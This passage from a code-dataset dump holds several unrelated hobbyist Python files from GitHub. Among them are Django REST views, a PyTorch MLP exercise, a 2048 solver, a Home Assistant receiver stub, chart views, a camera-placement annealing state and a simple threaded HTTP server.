LeadSerializer,SuggestionSerializer,ListSerializer,FavoriteSerializer,AddFavoriteSerializer,MyFavoriteSerializer\nfrom rest_framework import generics\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, JsonResponse\nfrom rest_framework.parsers import JSONParser\nfrom leads.scrape import get_data\n\n\nclass LeadListCreate(generics.ListCreateAPIView):\n queryset = Lead.objects.all()\n serializer_class = LeadSerializer \n\nclass SuggestionListCreate(generics.ListCreateAPIView):\n queryset = Suggestion.objects.all()\n serializer_class = SuggestionSerializer \n\nclass ListListCreate(generics.ListCreateAPIView):\n queryset = List.objects.all()\n serializer_class = ListSerializer \n\nclass FavoriteListCreate(generics.ListCreateAPIView):\n queryset = Favorite.objects.all()\n serializer_class = FavoriteSerializer \n\nclass SuggestionGet(generics.RetrieveAPIView):\n queryset = Suggestion.objects.all()\n serializer_class = SuggestionSerializer \n\n# class FavoriteGet(generics.RetrieveAPIView):\n# queryset = Favorite.objects.all()\n# serializer_class = FavoriteSerializer \n\n\n@csrf_exempt\ndef my_favorites(request):\n if not request.user.is_authenticated:\n return JsonResponse(status=403)\n\n if request.method == 'GET':\n #id = request.user.id\n favorites = Favorite.objects.filter(author__exact=request.user)\n serializer = MyFavoriteSerializer(favorites, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n@csrf_exempt\ndef add_favorite(request):\n if not request.user.is_authenticated:\n auth=dict()\n auth['message']='No authentification'\n return JsonResponse(auth, status=403)\n\n if request.method == 'POST':\n data = JSONParser().parse(request)\n data['author'] = request.user.id\n data['list'] = '1'\n #TODO: now always first list, later need to think which id to take\n # data['list_id'] = '1' #List.objects.get(pk=1).id\n serializer = FavoriteSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n@csrf_exempt\ndef is_auth(request):\n auth_data = dict()\n if request.user.is_authenticated:\n auth_data['auth'] = True\n user_data = dict()\n user_data['username']=request.user.username\n auth_data['user'] = user_data\n else:\n auth_data['auth'] = False\n return JsonResponse(auth_data, status=200)\n\n@csrf_exempt\ndef add_suggestion(request):\n if not request.user.is_authenticated:\n return JsonResponse(status=401)\n\n if request.method == 'POST':\n data = JSONParser().parse(request)\n data['author'] = request.user.id\n\n webpage_data = get_data(data['link'])\n if webpage_data['title']:\n data['title'] = webpage_data['title']\n\n if webpage_data['description']:\n dots_mark = '..'\n if len(webpage_data['description']) < 295:\n dots_mark = ''\n data['description'] = webpage_data['description'][:295] + dots_mark \n else:\n data['description'] = webpage_data['title']\n\n if webpage_data['keywords']:\n data['keywords'] = webpage_data['keywords'][:295]\n \n\n #TODO: get image from webpage\n if webpage_data['type']=='youtube':\n #get image\n data['image']=data['link']\n else:\n data['image']=data['link']\n\n\n #TODO: add to model: keywords and author (just to see who is using it)\n #get data from POST request\n #get data from webpage, if it exists, if there is some data etc\n # save the suggestion\n # save the same suggestion to users favorites\n\n # import pdb;pdb.set_trace()\n serializer = SuggestionSerializer(data=data)\n if 
serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n","repo_name":"arvis/langlearn","sub_path":"project/leads/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30130750934","text":"import torch\nfrom torch import nn \nfrom torch.nn import init\nimport numpy as np\nimport sys\nsys.path.append(\"..\") \nimport d2lzh_pytorch as d2l\n#构建网络\nnum_inputs, num_outputs, num_hiddens = 784, 10, 256\nnet = nn.Sequential(\n d2l.FlattenLayer(),\n nn.Linear(num_inputs,num_hiddens),\n nn.ReLU(),\n nn.Linear(num_hiddens,num_outputs)\n)\n#初始化参数\nfor params in net.parameters():\n init.normal_(params,mean=0,std=0.01)\n#定义损失函数\nloss = nn.CrossEntropyLoss()#分开定义softmax运算和交叉熵损失函数可能会造成数值不稳定,pytorch提供了包括softmax运算和交叉熵损失计算的函数\n#定义优化器\noptimizer = torch.optim.SGD(net.parameters(), lr=0.5)\n#读取数据\nbatch_size = 256\ntrain_iter, test_iter = d2l.load_data_fashion_mnist(batch_size)\n#训练模型\nnum_epochs = 5\nd2l.train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, None, None, optimizer)","repo_name":"zhangsx19/pytorch-exercise","sub_path":"MLPpytorch实现.py","file_name":"MLPpytorch实现.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41073512218","text":"from typing import List\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n if root == None:\n return []\n if root.left == None and root.right == None:\n return [root.val]\n ret = []\n if root.left:\n ret.extend(self.inorderTraversal(root.left))\n ret.append(root.val)\n if root.right:\n ret.extend(self.inorderTraversal(root.right))\n return ret\n\n","repo_name":"felixchr/leetcode","sub_path":"p0094_binary_tree_inorder_travesal.py","file_name":"p0094_binary_tree_inorder_travesal.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74422224849","text":"\"\"\"\nSupport for interface with a AnthemAV Receiver.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/media_player/\n\"\"\"\nimport logging\nimport socket\nimport select\nimport time\nimport re\nimport voluptuous as vol\n\n\nfrom homeassistant.components.media_player import (\n SUPPORT_TURN_OFF, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_SET,\n SUPPORT_SELECT_SOURCE, SUPPORT_VOLUME_STEP, MediaPlayerDevice,\n PLATFORM_SCHEMA)\nfrom homeassistant.const import (\n CONF_HOST, CONF_NAME, STATE_OFF, STATE_ON, STATE_UNKNOWN, CONF_PORT)\nimport homeassistant.helpers.config_validation as cv\n\n_LOGGER = logging.getLogger(__name__)\n\nDEFAULT_NAME = 'AnthemAV'\nDEFAULT_MRXZONE = 1\nCONF_MRXZONE = \"mrxzone\"\nCONF_MINVOL = \"minvol\"\nCONF_MAXVOL = \"maxvol\"\nDEFAULT_MINVOL = -60\nDEFAULT_MAXVOL = -30\n# CONF_TIMEOUT = \"timeout\"\n# CONF_BUFFER_SIZE = \"buffer_size\"\n# DEFAULT_TIMEOUT = 10\n# DEFAULT_BUFFER_SIZE = 1024\n# mrx_payload = \"payload\"\nCONF_MRXMODEL = \"mrxmodel\"\nDEFAULT_MRXMODEL = \"x00\"\n\nSUPPORT_ANTHEMMRX = SUPPORT_SELECT_SOURCE | SUPPORT_VOLUME_STEP | \\\n SUPPORT_VOLUME_SET | SUPPORT_VOLUME_MUTE | 
SUPPORT_TURN_OFF\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_HOST): cv.string,\n vol.Required(CONF_PORT): cv.port,\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_MRXMODEL, default=DEFAULT_MRXMODEL): cv.string,\n vol.Optional(CONF_MRXZONE, default=DEFAULT_MRXZONE): cv.positive_int,\n vol.Optional(CONF_MINVOL, default=DEFAULT_MINVOL): vol.Coerce(float),\n vol.Optional(CONF_MAXVOL, default=DEFAULT_MAXVOL): vol.Coerce(float),\n # vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,\n})\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Setup the AnthemAV platform.\"\"\"\n add_devices([AnthemAV(hass, config)])\n return True\n\n\nclass AnthemAV(MediaPlayerDevice):\n \"\"\"Representation of a AnthemAV Receiver.\"\"\"\n\n def __init__(self, hass, config):\n \"\"\"Initialize the AnthemAV device.\"\"\"\n\n self._name = config.get(CONF_NAME)\n self._muted = None\n self._volume = 0\n self._state = STATE_UNKNOWN\n self._response = None\n self._lastupdatetime = None\n self._selected_source = ''\n self._source_name_to_number = {v: k for k,\n v in mrx_sources.items()}\n self._source_number_to_name = mrx_sources\n self._config = {\n CONF_NAME: config.get(CONF_NAME),\n CONF_HOST: config[CONF_HOST],\n CONF_PORT: config[CONF_PORT],\n CONF_MRXZONE: config.get(CONF_MRXZONE, DEFAULT_MRXZONE),\n CONF_MINVOL: config.get(CONF_MINVOL, DEFAULT_MINVOL),\n CONF_MAXVOL: config.get(CONF_MAXVOL, DEFAULT_MAXVOL),\n CONF_TIMEOUT: config.get(CONF_TIMEOUT, DEFAULT_TIMEOUT),\n CONF_BUFFER_SIZE: config.get(\n CONF_BUFFER_SIZE, DEFAULT_BUFFER_SIZE),\n }\n self.update()\n\n def update(self):\n \"\"\"Retrieve the latest data.\"\"\"\n\n @property\n def source(self):\n \"\"\"Return the current input source.\"\"\"\n return self._selected_source\n\n @property\n def source_list(self):\n \"\"\"List of available input sources.\"\"\"\n return list(self._source_name_to_number.keys())\n\n def select_source(self, source):\n \"\"\"Select input source.\"\"\"\n _LOGGER.info(\"Select Source: %s\",\n self._source_name_to_number.get(source))\n\n @property\n def name(self):\n \"\"\"Return the name of the device.\"\"\"\n return self._name\n\n @property\n def state(self):\n \"\"\"Return the state of the device.\"\"\"\n return self._state\n\n @property\n def volume_level(self):\n \"\"\"Volume level of the media player (0..1).\"\"\"\n return self._volume\n\n @property\n def is_volume_muted(self):\n \"\"\"Boolean if volume is currently muted.\"\"\"\n return self._muted\n\n @property\n def supported_media_commands(self):\n \"\"\"Flag of media commands that are supported.\"\"\"\n return SUPPORT_ANTHEMMRX\n\n def turn_off(self):\n \"\"\"Turn off media player.\"\"\"\n\n def turn_on(self):\n \"\"\"Turn off media player.\"\"\"\n\n def volume_up(self):\n \"\"\"Volume up the media player.\"\"\"\n\n def volume_down(self):\n \"\"\"Volume down media player.\"\"\"\n\n def mute_volume(self, mute):\n \"\"\"Send mute command.\"\"\"\n\n def set_volume_level(self, volume):\n \"\"\"Set volume level, range 0..1.\"\"\"\n mrxvol = int(((self._config[CONF_MAXVOL]\n - self._config[CONF_MINVOL])\n * volume) - (0 - self._config[CONF_MINVOL]))\n\n\n\n# new class for mrx control\n\n # object for each model type with commands and regex\n # volume_up\n # volume_down\n # volume_set\n # volume_get\n # power_on\n # power_off\n # power_get\n # mute_on\n # mute_off\n # mute_toggle\n # mute_get\n # source_set\n # source_get\n\n# Use regex with named groups\n# >>> m = re.match(r\"(?P\\w+) 
(?P\\w+)\", \"Malcolm Reynolds\")\n# >>> m.group('first_name')\n# 'Malcolm'\n# >>> m.group('last_name')\n# 'Reynolds'\n# combine dictionary\n\n# Use format tags\n\n# use server client method like squeezebox to limit polling of mrx\n\n # # initialise mrx:\n # mrx.initialise(host, port, model)\n # mrx.initialise(192.168.2.200, 4998, 'x00')\n # models: x00, x10, x20\n\n # # store mrx response in object:\n # mrx.state.[zone].[state]\n # mrx.state.[1].volume = -60\n # mrx.state.[1].mute = 0\n # mrx.state.[1].source = 3\n # mrx.state.[1].power = 1\n # store timestamp of last received command\n\n # # commands:\n # mrx.[command](zone, value)\n # mrx.setvolume(1, -60)\n # mrx.setsource(1, 1), use source numbers\n # mrx.setmute(1, 0), options 0, 1, T\n # mrx.setpower(1, 1), options 0, 1\n\n # # Update:\n # mrx.update()\n # optional: limit to 5 seconds since last complete set of information\n\n # # Socket connection:\n # Current: open, send, receive, close every command.\n # optional: open socket connection and watch all responses.\n","repo_name":"tinglis1/anthemav","sub_path":"_HA Component/anthemav.py","file_name":"anthemav.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73424511249","text":"#2048(Easy)\n'''\ndfs()함수 다시 이해해보기\ndfs 알고리즘 공부 필요!!\n재귀함수 너무 어렵다..\n'''\nimport sys,copy\n\ndef move(direction):\n if direction==0: #위쪽 방향으로 이동\n for j in range(n):\n idx=0 #0행부터 차례대로 검사하기 위한 변수\n for i in range(1,n):\n if board[i][j]: #0이 아니라면\n temp=board[i][j] #temp에 값 일시 저장\n board[i][j]=0 #블럭이 옮겨졌다고 생각하고 0으로 수정\n if board[idx][j]==0: #위쪽이 비어있으면\n board[idx][j]=temp #저장한 temp값을 위쪽으로 옮김\n elif board[idx][j]==temp: #저장한 값과 위쪽에 있는 값이 같으면\n board[idx][j]=temp*2 #블록 합침\n idx+=1 #그 다음 행을 탐색하기 위해서\n else: #위쪽이 비어있지도, 같은 블럭도 아니라면\n idx+=1 #그 위에 블럭을 쌓아야 하기 때문에 idx먼저 증가 시킨 후\n board[idx][j]=temp #임시저장한 값을 그대로 다시 보드에 넣음\n\n elif direction == 1: #아래로 이동\n for j in range(n):\n idx = n - 1 #보드의 맨 아래 행\n for i in range(n - 2, -1, -1):\n if board[i][j]: #옮길 블럭이 있다면\n temp = board[i][j] #temp에 값 일시 저장 후\n board[i][j] = 0 #블럭을 옮겼다 치고 0으로 수정\n if board[idx][j] == 0: #비어있다면\n board[idx][j] = temp #임시저장한 값 넣음 (아래로 이동)\n elif board[idx][j] == temp: #옮길 값(temp)와 아래에 있는 블럭이 같다면\n board[idx][j] = temp * 2 #블럭 합침\n idx -= 1 #블럭이 쌓임\n else:\n idx -= 1\n board[idx][j] = temp\n\n elif direction == 2: #왼쪽으로 이동\n for i in range(n):\n idx = 0 #열을 나타 냄\n for j in range(1, n):\n if board[i][j]:\n temp = board[i][j]\n board[i][j] = 0\n if board[i][idx] == 0:\n board[i][idx] = temp\n elif board[i][idx] == temp:\n board[i][idx] = temp * 2\n idx += 1\n else:\n idx += 1\n board[i][idx] = temp\n\n else: #오른쪽으로 이동\n for i in range(n):\n idx = n - 1\n for j in range(n - 2, -1, -1):\n if board[i][j]:\n temp = board[i][j]\n board[i][j] = 0\n if board[i][idx] == 0:\n board[i][idx] = temp\n elif board[i][idx] == temp:\n board[i][idx] = temp * 2\n idx -= 1\n else:\n idx -= 1\n board[i][idx] = temp\n\ndef dfs(count):\n global maxBlock,board\n if count==5: #최대 5번 움직였다면 멈추고 전체 배열의 최대 값을 반환\n for i in range(n):\n for j in range(n):\n maxBlock=max(maxBlock,board[i][j])\n return\n copyBoard=copy.deepcopy(board) #이동 전 보드의 상태 저장\n for i in range(4):\n move(i) #move()함수로 이동 뒤\n dfs(count+1) #재귀적으로 호출\n board=copy.deepcopy(copyBoard)\n\nn=int(sys.stdin.readline())\nboard=[]\nfor i in range(n):\n 
board.append(list(map(int,sys.stdin.readline().split())))\nmaxBlock=0\ndfs(0)\nprint(maxBlock)","repo_name":"dbswl4951/baekjoon_algorithm","sub_path":"backjoon_algorithm/implementation/ex12100.py","file_name":"ex12100.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16682343267","text":"#!/usr/bin/python3\n\"\"\"This script will check utf-8 validity\"\"\"\n\n\ndef validUTF8(data):\n \"\"\"This script will return true if given list is a valid UTF-8\"\"\"\n num_bytes = 0\n for i in range(len(data)):\n bits = format(data[i], '#010b')[-8:]\n if bits[0] == '0':\n continue\n else:\n for bit in bits:\n if bit != '0':\n num_bytes += 1\n else:\n break\n if num_bytes == 1 or num_bytes >= 5:\n return False\n if (num_bytes > 1 and num_bytes <= 4):\n after_byte = i + 1\n last_byte = i + num_bytes\n if (after_byte > len(data) or last_byte > len(data)):\n return False\n for j in range(after_byte, last_byte):\n new_bits = format(data[j], '#010b')[-8:]\n if not (new_bits[0] == '1' and new_bits[1] == '0'):\n return False\n else:\n continue\n return True\n return True\n","repo_name":"samie-ya/alx-interview","sub_path":"0x04-utf8_validation/0-validate_utf8.py","file_name":"0-validate_utf8.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42911449339","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Include the `fusioncharts.py` file which has required functions to embed the charts in html page\nfrom fusioncharts import FusionCharts\n\n# Loading Data from a Static JSON String\n# It is a example to show a MsCombi 2D chart where data is passed as object.\n# The `chart` method is defined to load chart data\ndef chart(request):\n\n datasource = {}\n datasource[\"chart\"] = {\n \"caption\": \"Actual Revenues, Targeted Revenues & Profits\",\n \"subcaption\": \"Last year\",\n \"xaxisname\": \"Month\",\n \"yaxisname\": \"Amount (In USD)\",\n \"numberprefix\": \"$\",\n \"theme\": \"ocean\"\n }\n datasource[\"categories\"] = [{\n \"category\": [\n {\"label\": \"Jan\"},\n {\"label\": \"Feb\"},\n {\"label\": \"Mar\"},\n {\"label\": \"Apr\"},\n {\"label\": \"May\"},\n {\"label\": \"Jun\"},\n {\"label\": \"Jul\"},\n {\"label\": \"Aug\"},\n {\"label\": \"Sep\"},\n {\"label\": \"Oct\"},\n {\"label\": \"Nov\"},\n {\"label\": \"Dec\"}\n ]\n }]\n\n datasource[\"dataset\"] = [{\n \"seriesname\": \"Actual Revenue\",\n \"data\": [\n {\"value\": \"16000\"},\n {\"value\": \"20000\"},\n {\"value\": \"18000\"},\n {\"value\": \"19000\"},\n {\"value\": \"15000\"},\n {\"value\": \"21000\"},\n {\"value\": \"16000\"},\n {\"value\": \"20000\"},\n {\"value\": \"17000\"},\n {\"value\": \"25000\"},\n {\"value\": \"19000\"},\n {\"value\": \"23000\"}\n ]\n }, {\n \"seriesname\": \"Projected Revenue\",\n \"renderas\": \"line\",\n \"showvalues\": \"0\",\n \"data\": [\n {\"value\": \"15000\"},\n {\"value\": \"16000\"},\n {\"value\": \"17000\"},\n {\"value\": \"18000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"20000\"},\n {\"value\": \"21000\"},\n {\"value\": \"22000\"},\n {\"value\": \"23000\"}\n ]\n }, {\n \"seriesname\": \"Profit\",\n \"renderas\": \"area\",\n \"showvalues\": \"0\",\n \"data\": [\n {\"value\": \"4000\"},\n {\"value\": \"5000\"},\n 
{\"value\": \"3000\"},\n {\"value\": \"4000\"},\n {\"value\": \"1000\"},\n {\"value\": \"7000\"},\n {\"value\": \"1000\"},\n {\"value\": \"4000\"},\n {\"value\": \"1000\"},\n {\"value\": \"8000\"},\n {\"value\": \"2000\"},\n {\"value\": \"7000\"}\n ]\n }\n ]\n\n # Create an object for the mscombi2d chart using the FusionCharts class constructor\n mscombi2dChart = FusionCharts(\"mscombi2d\", \"ex1\", \"100%\", 400, \"chart-1\", \"json\", datasource)\n # returning complete JavaScript and HTML code, which is used to generate chart in the browsers. \n pyramidChart = FusionCharts(\"pyramid\", \"ex2\", \"70%\", \"385\", \"chart-2\", \"json\", \n \"\"\"{\n \"chart\": {\n \"bgcolor\": \"FFFFFF\",\n \"caption\": \"Revenue distribution for 2017\",\n \"basefontcolor\": \"333333\",\n \"decimals\": \"0\",\n \"numbersuffix\": \"M\",\n \"numberprefix\": \"$\",\n \"pyramidyscale\": \"40\",\n \"chartbottommargin\": \"0\",\n \"captionpadding\": \"0\",\n \"showborder\": \"0\"\n },\n \"data\": [\n {\n \"value\": \"17\",\n \"name\": \"Products\",\n \"color\": \"008ee4\"\n },\n {\n \"value\": \"21\",\n \"name\": \"Services\",\n \"color\": \"6baa01\"\n },\n {\n \"value\": \"20\",\n \"name\": \"Consultancy\",\n \"color\": \"f8bd19\"\n },\n {\n \"value\": \"5\",\n \"name\": \"Others\",\n \"color\": \"e44a00\"\n }\n ]\n }\"\"\")\n\n # Create an object for the funnel chart using the FusionCharts class constructor\n funnelChart = FusionCharts(\"funnel\", \"ex3\", \"70%\", \"385\", \"chart-3\", \"json\", \n \"\"\"{\n \"chart\": {\n \"bgcolor\": \"FFFFFF\",\n \"caption\": \"Conversion - 2017\",\n \"decimals\": \"1\",\n \"basefontsize\": \"11\",\n \"issliced\": \"0\",\n \"ishollow\": \"1\",\n \"labeldistance\": \"8\",\n \"showBorder\": \"0\"\n },\n \"data\": [\n {\n \"label\": \"Website Visits\",\n \"value\": \"385634\"\n },\n {\n \"label\": \"Downloads\",\n \"value\": \"145631\",\n \"color\": \"008ee4\"\n },\n {\n \"label\": \"Interested to Participate\",\n \"value\": \"84564\",\n \"color\": \"f8bd19\"\n },\n {\n \"label\": \"Contracts finalized\",\n \"value\": \"50654\",\n \"color\": \"6baa01\"\n },\n {\n \"label\": \"Adquired\",\n \"value\": \"25342\",\n \"color\": \"e44a00\"\n }\n ]\n }\"\"\")\n\n pie3d = FusionCharts(\"pie3d\", \"ex4\" , \"80%\", \"400\", \"chart-4\", \"json\", \n # The data is passed as a string in the `dataSource` as parameter.\n \"\"\"{ \n \"chart\": {\n \"caption\": \"Age profile of website visitors\",\n \"subcaption\": \"Last Year\",\n \"startingangle\": \"120\",\n \"showlabels\": \"0\",\n \"showlegend\": \"1\",\n \"enablemultislicing\": \"0\",\n \"slicingdistance\": \"15\",\n \"showpercentvalues\": \"1\",\n \"showpercentintooltip\": \"0\",\n \"plottooltext\": \"Age group : $label Total visit : $datavalue\",\n \"theme\": \"ocean\"\n },\n \"data\": [\n {\"label\": \"Teenage\", \"value\": \"1250400\"},\n {\"label\": \"Adult\", \"value\": \"1463300\"},\n {\"label\": \"Mid-age\", \"value\": \"1050700\"},\n {\"label\": \"Senior\", \"value\": \"491000\"}\n ]\n }\"\"\")\n # returning complete JavaScript and HTML code, which is used to generate chart in the browsers. 
\n return render(request, 'index.html', {'mscombi2dChart' : mscombi2dChart.render(), 'pyramidChart' : pyramidChart.render(),\n 'funnelChart' : funnelChart.render(), 'pie3d': pie3d.render()})","repo_name":"Brunux/subscriber-backend","sub_path":"analytics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39729302943","text":"import cv2\nimport math\n\n\n\ncap = cv2.VideoCapture(r\"F:\\计算机设计大赛\\计设数据集\\最终数据集视频\\2023_4_19_成功1.avi\")\nframeRate = cap.get(5) # frame rate\nif not cap.isOpened():\n print('error')\n exit(-1)\nwhile (cap.isOpened()):\n frameId = cap.get(1) # current frame number\n ret, frame = cap.read()\n if (ret != True):\n break\n if frameId % math.floor(frameRate) == 0:\n filename = '../Dataset/oriData/image_2_' + str(int(frameId)) + \".png\"\n try:\n cv2.imwrite(filename, frame)\n except:\n print('error occur, maybe img folder not exist')\ncap.release()\nprint (\"Done!\")","repo_name":"tsieyy/data_augmentation","sub_path":"tools/avi2jpg.py","file_name":"avi2jpg.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39534498596","text":"import random, sys, copy\nfrom src.Camera import Camera\n\n\nclass State:\n def __init__(self, problem, cameras=None):\n self.problem = problem\n self.cameras = []\n self.cameras = cameras if cameras is not None else self.generateCameras()\n self.energy = sys.maxsize\n self.coverage_energy = None\n self.camera_cost = None\n self.redundancy_cost = None\n\n def getRandomFreePointFromRoom(self):\n free_points = self.getFreePoints()\n if not free_points:\n error = \"Exception in State.getRandomFreePointFromRoom: no points left!\"\n raise RuntimeError(error)\n else:\n return random.choice(free_points)\n\n def getFreePoints(self):\n def isCameraPos(cls, pos):\n for c in cls.cameras:\n if c.x == pos[0] and c.y == pos[1]:\n return True\n return False\n\n return list(filter(lambda p: not isCameraPos(self, p), self.problem.inside_points))\n\n def generateCameras(self):\n cameras = []\n for _ in range(self.problem.min_number_of_cams):\n cameras.append(Camera(self.problem, self.getRandomFreePointFromRoom()))\n\n return cameras\n\n def generateNeighbour(self, camera_move_method):\n # deep copy cameras\n cameras = [copy.copy(c) for c in self.cameras]\n\n transformation = self.randomlyChooseTransformationMethod(cameras)\n\n # perform transformation\n if transformation == 'insert':\n new_camera = Camera(self.problem, self.getRandomFreePointFromRoom())\n cameras.append(new_camera)\n elif transformation == 'remove':\n cameras.remove(random.choice(self.cameras))\n elif transformation == 'move':\n to_modify = random.choice(self.cameras)\n if camera_move_method == 'local':\n to_modify.move()\n elif camera_move_method == 'random':\n to_modify.move(self.getRandomFreePointFromRoom())\n else:\n raise RuntimeError(\"Wrong move camera method!\")\n else:\n raise RuntimeError(\"Wrong transformation method!\")\n\n return State(self.problem, cameras)\n\n def randomlyChooseTransformationMethod(self, cameras):\n free_points = self.getFreePoints()\n choices = set()\n\n if len(cameras) <= 1:\n choices.add('insert')\n else:\n choices.add('remove')\n if len(free_points) > 0:\n choices.update({'insert', 'move'})\n return 
random.choice(tuple(choices))\n","repo_name":"wfranus/cameras","sub_path":"src/State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"29988229208","text":"import math\n\nfrom Artist import Artist\nfrom ArtistTags import ArtistTags\nfrom TagArtistWeights import TagArtistWeights\n\nclass ArtistWeightCalc:\n \"\"\"\n Calculates the weights of artists to tags they have been assigned to.\n\n For instance, artists tagged only as \"funk\" are weighted higher than\n artists tagged partially as \"funk\".\n \"\"\"\n\n def __init__(self):\n # Tags used fewer times will be excluded from the graph\n self._minTagCount = 0\n\n # Map from artistId to artist object\n # Ensures uniqueness of Artist objects to save memory\n self._artists = {}\n\n # Stores the relationship between artists and tags\n self._artistTags = ArtistTags()\n\n def setMinTagCount(self, minTagCount):\n self._minTagCount = minTagCount\n\n def add(self, artistId, artistName, tag, tagCount):\n artistId = artistId.lower()\n artistName = artistName.lower()\n tag = tag.lower()\n\n # Get the artist. O(1) on average\n artist = None\n if artistId in self._artists:\n artist = self._artists[artistId]\n else:\n artist = Artist(artistId, artistName)\n self._artists[artistId] = artist\n \n self._artistTags.add(artist, tag, tagCount)\n\n return artist\n\n def pruneTags(self):\n tagsToRemove = []\n\n for tag in self._artistTags.getTags():\n if not self._acceptTag(tag):\n tagsToRemove.append(tag)\n\n for tag in tagsToRemove:\n artistsWithNoTags = self._artistTags.remove(tag)\n\n for artist in artistsWithNoTags:\n del self._artists[artist.getId()]\n\n def getTagToArtistsWeights(self):\n # Dictionary from tag to (Artist, weight)\n tagArtistWeights = TagArtistWeights()\n\n totalTagCount = self._artistTags.getTagCount() \n\n for tag in self._artistTags.getTags():\n currentTagCount = self._artistTags.getTotalTagCount(tag)\n\n for artist in self._artistTags.getArtistsWithTag(tag):\n artistTagCount = self._artistTags.getTagCountOfArtist(tag, artist)\n # Number of times the artist appears for the tag / number of artist songs for tag\n tf = artistTagCount / currentTagCount\n # loge(number of tags / number of tags with artist)\n idf = math.log(totalTagCount / self._artistTags.getArtistTagCount(artist))\n\n #print('For Artist %s with tag %s' %(artist.getName(), tag))\n #print(' tf = %d / %d = %.3f' %(artistTagCount, currentTagCount, tf))\n #print(' idf = log(%d / %d) = %.3f' %(totalTagCount, self._artistTags.getArtistTagCount(artist), idf))\n #print(' tf*idf = %.3f' %(tf * idf))\n\n tfidf = tf * idf\n\n tagArtistWeights.add(tag, artist, tfidf)\n\n return tagArtistWeights\n\n def _acceptTag(self, tag):\n \"\"\" Flags to disregard tags which are only used once. 
\"\"\"\n return len(self._artistTags.getArtistsWithTag(tag)) >= self._minTagCount\n\n def getArtistTags(self):\n return self._artistTags\n\n def getArtists(self):\n return self._artists\n\n def getStatsString(self):\n return 'Stats: #artists: %d, #tags: %d' % (len(self._artists), self._artistTags.getTagCount())\n\n","repo_name":"FahmiA/MatchThatGenre","sub_path":"TagGraphGenerator/ArtistWeightCalc.py","file_name":"ArtistWeightCalc.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37776546002","text":"import socket\nfrom threading import Lock, Thread\n\nfrom request import Request\nfrom response import Response\n\nclass Server:\n BUFFERSIZE = 1024\n def __init__(self, host: str, port: int, debug:bool=False):\n self._host = host\n self._port = port\n self._s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._debug = debug\n self._print_lock = Lock()\n\n def initialize(self):\n self._s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._s.bind((self._host, self._port))\n self._s.listen(5) # Don't know what the number does and seems to not matter\n self._debug_print(f\"listening on {self._host}:{self._port}\")\n self._running = False\n\n def run(self):\n self._running = True\n while self._running:\n try:\n conn, addr = self._s.accept()\n self._debug_print(f\"Accepted connection from {str(addr)}\")\n t = Thread(target=self.handle_client, args=(conn, addr))\n t.start()\n except KeyboardInterrupt:\n self._running = False\n\n self._debug_print(\"Closing server\")\n self._s.close()\n\n def handle_client(self, conn: socket.socket, addr):\n data = conn.recv(Server.BUFFERSIZE)\n req = Request()\n if req.parse(data):\n self._debug_print(f\"Incoming {req.get_method().value} request for {req._path} from {str(addr)}\")\n resp = Response()\n resp.compose_response(req)\n to_send = resp.encode()\n conn.send(to_send)\n\n self._debug_print(f\"Closing connection from {str(addr)}\")\n conn.close()\n\n def _debug_print(self, msg):\n if self._debug:\n with self._print_lock:\n print(msg)\n","repo_name":"yutytuty/ImprovedHttpServer","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33213630671","text":"import sqlite3\r\n\r\n\r\nclass Review:\r\n dbpath = \"data/stacked.db\"\r\n\r\n\r\n def __init__(self, pk,review,company,time_stamp,pros,cons,users_pk ):\r\n self.pk = pk\r\n self.review = review\r\n self.company = company\r\n self.time_stamp = time_stamp\r\n self.pros = 